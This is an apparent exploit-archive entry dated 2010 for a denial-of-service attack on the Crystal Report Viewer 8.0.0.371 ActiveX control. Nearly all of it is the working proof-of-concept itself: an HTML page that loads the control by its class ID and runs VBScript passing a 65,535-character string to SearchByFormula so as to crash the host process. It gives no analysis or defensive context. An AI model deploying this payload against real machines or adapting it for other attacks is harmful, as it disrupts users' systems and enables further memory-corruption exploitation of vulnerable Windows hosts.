Crystal Report Viewer 8.0.0.371 - ActiveX Denial of Service

Author: Matthew Bergin
type: dos
platform: windows
port: 
date_added: 2010-11-03  
date_updated: 2010-11-03  
verified: 0  
codes:   
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 15408.html  

<html>
Crystal Reporting Viewer v8.0.0.371
Author: Matthew Bergin
Website: www.berginpentesting.com
Website: www.smashthestack.org
<object classid='clsid:C4847596-972C-11D0-9567-00A0C9273C2A' id='target' ></object>
<script language='vbscript'>

targetFile = "C:\WINDOWS\system32\crviewer.dll"
prototype  = "Sub SearchByFormula ( ByVal formula As String )"
memberName = "SearchByFormula"
progid     = "CRVIEWERLib.CRViewer"
argCount   = 1

arg1=String(65535, "A")

target.SearchByFormula arg1

</script>